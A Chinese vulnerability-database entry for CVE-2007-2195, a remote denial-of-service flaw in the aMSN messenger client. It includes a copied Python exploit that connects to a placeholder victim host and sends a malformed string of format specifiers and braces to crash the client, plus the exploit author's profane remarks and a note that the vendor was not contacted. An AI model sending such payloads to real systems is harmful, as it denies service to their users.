aMSN畸形消息拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112750 漏洞类型 其他
发布时间 2007-04-21 更新时间 2007-04-25
CVE编号 CVE-2007-2195 CNNVD-ID CNNVD-200704-459
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29875
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-459
|漏洞详情
aMSN一个免费的、开放源码的MSNMessenger的克隆版。aMSN在处理畸形消息时存在拒绝服务漏洞,远程攻击者可能利用此漏洞导致aMSN客户端崩溃。如果向aMSN发送了包含有"}"、"{"、"%x""或"%n"字符的特制消息的话,就可能导致客户端崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/23583/info

aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects aMsn 0.96 and prior versions.

import socket

HOST = 'victim.com'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
   s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
          ?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
          %n%n%n%n%n%n\????#?[{#?]?#\`~??')

---fuck off here---

I think it were the character '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit.

/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.

/* EOF */
|参考资料

来源:MISC
链接:http://www.securityfocus.com/data/vulnerabilities/exploits/23583.c
来源:BID
名称:23583
链接:http://www.securityfocus.com/bid/23583
来源:OSVDB
名称:39116
链接:http://osvdb.org/39116